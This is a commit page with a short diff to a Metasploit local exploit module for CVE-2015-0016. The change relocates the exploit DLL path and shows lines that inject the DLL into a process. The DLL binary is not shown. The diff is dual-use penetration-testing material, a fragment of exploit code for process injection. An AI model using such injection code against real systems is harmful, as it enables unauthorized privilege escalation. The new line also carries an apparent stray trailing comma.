Update DLL
This commit is contained in:
Binary file not shown.
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||
print_status('Exploiting...')
|
||||
|
||||
process = client.sys.process.open
|
||||
library_path = ::File.join('/', 'tmp', 'reflective_dll.dll')
|
||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0016', 'cve-2015-0016.dll'),
|
||||
print_status("Injecting exploit into #{process.pid}...")
|
||||
exploit_mem, offset = inject_dll_into_process(process, library_path)
|
||||
|
||||
|
||||
Reference in New Issue
Block a user